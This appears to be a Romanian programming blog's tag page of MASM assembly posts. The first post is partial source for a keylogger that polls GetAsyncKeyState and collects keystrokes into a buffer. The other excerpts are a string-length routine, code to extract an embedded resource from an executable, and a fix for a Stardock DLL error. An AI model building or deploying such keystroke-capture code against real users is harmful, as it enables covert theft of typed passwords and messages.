Etichetă: masm

Keylogger Asm

This article has been written before more than 24months, information might old.

Am rescris metoda cu GetAsyncKeyState in masm , ma rog e mai necizelata dar merge :
Cod :


.Const

.Data?

sh DD ?
cp DD ?
Number DD ?

index DD ?
tindex DD ?
TempC DB ?

.Data

WprType DB "%lc", 0
Keys DB 512 Dup(0)

.Code
start:
Mov Keys, 0
rr:
Invoke Sleep, 60
Mov index, 0
Mov index, 8
ForLoop:
;test
Invoke GetAsyncKeyState, 14H
.If Eax
Invoke MessageBox, 0, Addr Keys, 0, 0
Invoke ExitProcess, NULL
.EndIf
;test
Invoke GetAsyncKeyState, index
.If Eax == -32767 ;
Invoke GetAsyncKeyState, 20H
.If Eax
Invoke wsprintf, Addr TempC, Addr WprType, 20H ; Space ajunge ...
Invoke lstrcat, Addr Keys, Addr TempC
.ElseIf (index >= 60) && (index < = 90)
Mov sh, 0
Mov cp, 0
Invoke GetAsyncKeyState, 14H ;
Mov sh, Eax
Invoke GetAsyncKeyState, 10H ;
Mov cp, Eax
.If cp != 0 || sh != 0 ;
Xor Eax, Eax
Mov tindex, Eax
Mov Eax, index
Mov tindex, Eax
Invoke wsprintf, Addr TempC, Addr WprType, tindex

Snippet StrLen Asm

This article has been written before more than 24months, information might old.

Avem in windows functia lstrlen , dar lstrlen nu reda marimea in format numeric , asa ca trebuie transformat in ascii de prefeinta , putem face asta cu functia dwtoa care se afla in masm32.lib dar decat sa folosim 2 functii ca sa facem una putem folosi functia de mai jos :

StrLen proc pStr:DWORD
	mov eax,[esp+1*4]                  ; get pointer to string
	mov edx,eax
	xor ecx,ecx
@@:                                    
	test al,3                        
	jz @F                            
	mov cl,[eax]                     
	inc eax                          
	test cl,cl                       
	jnz @B                           
	sub cl,1
	jmp @1
@@:                                    
	mov edx,[eax]                      ; read first 4 bytes
	add eax,4                          ; increment pointer
	lea ecx,[edx-01010101h]            ; subtract 1 from each byte
	xor edx,-1                         ; invert all bytes
	and ecx,edx                        ; and these two
	and ecx,80808080h                  ; test all sign bits
	jz @B                              ; no zero bytes, continue loop
	mov edx,[esp+1*4]                  ; get pointer to string
	add edx,3                          ; pointer+3
	test ecx,00008080h                 ; test first two bytes
	jnz @F                           
	shr ecx,16                         ; not in the first 2 bytes
	add eax,2                        
@@:
	shl cl,1                           ; use carry 

Embedded File in Exe Asm

This article has been written before more than 24months, information might old.

Un mic exemplu pentru a extrage o resursa inglobata intr-un exe , exemplul este simbolic nu poate fi compliat caci este o bucata dintr-un cod-sursa al unui executabil , dar poate va desluseste ce functii ati putea folosi pentru a face acest lucru exemplu mai jos :

Invoke  FindResource, NULL, ZIPDLL, RT_FILEDATA
Mov hMIDIres, Eax ;
Invoke GetWindowItem, [hWnd], IDC_WMAIN_LSTE
Invoke SetText, Eax, Addr lste
Invoke GetWindowItem, [hWnd], IDC_WMAIN_PGB
Invoke SetValue, Eax, 70
Invoke Sleep, 2500
Invoke SizeofResource, NULL, hMIDIres ;
Mov hMIDISize, Eax ;
Invoke LoadResource, NULL, hMIDIres ;
Invoke LockResource, Eax
Mov hMIDIres, Eax
Invoke GetWindowItem, [hWnd], IDC_WMAIN_LSTF
Invoke SetText, Eax, Addr lstf
Invoke GetWindowItem, [hWnd], IDC_WMAIN_PGB
Invoke SetValue, Eax, 85
Invoke Sleep, 2500
Invoke CreateFile, Addr szdllfpath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, 0
Mov Ebx, Eax
Invoke WriteFile, Ebx, hMIDIres, hMIDISize, Addr numchar, 0 ;
Invoke CloseHandle, Ebx
Invoke GetWindowItem, [hWnd], IDC_WMAIN_LSTG
Invoke SetText, Eax, Addr lstg
Invoke GetWindowItem, [hWnd], IDC_WMAIN_PGB
Invoke SetValue, Eax, 100

De functile SetValue , Getwindowitem , SetText , si Sleep …

Fix Faild to load SDCzip.dll

This article has been written before more than 24months, information might old.

Am scris un fix pentru erroarea ” Faild to load SDCzip.dll ” ce apare uneori la Stardock IconPackager , il putei downloada de aici : http://fix-faild-to-load-sdczip-stardock.googlecode.com/files/FixForStardock.exe , codul sursa il gasiti la adresa http://code.google.com/p/fix-faild-to-load-sdczip-stardock/downloads/list este compatibil cu EasyCoder Ide , nu este pure asm dar poate fi transformat , relativ usor insa codul ar fi mult mai amplu , mai jos este un preview al codului care nu poate fi compilabil , daca veti sa il compilati descarcati sursa ..

Ps : sper ca nu se simte nimeni ofensat de icontia natzi … , trebuie sa recunoasteti ca e un design destul de reusit ….

Code :

.Const

.Data?
;dll
hMIDIres DD ?  ;
hMIDISize DD ?   ;
hMIDIdevID DD ?  ;
numchar DD ?
;dll


;path
szfolder DB ?
szstardf DB ?
szdllfpath DB ?

;path

.Data

lsta DB " Geting the path to 0X0026commun files ... " , 0
lstb DB " Creating necessary directory ... " , 0
lstc DB " Writing registry  ... "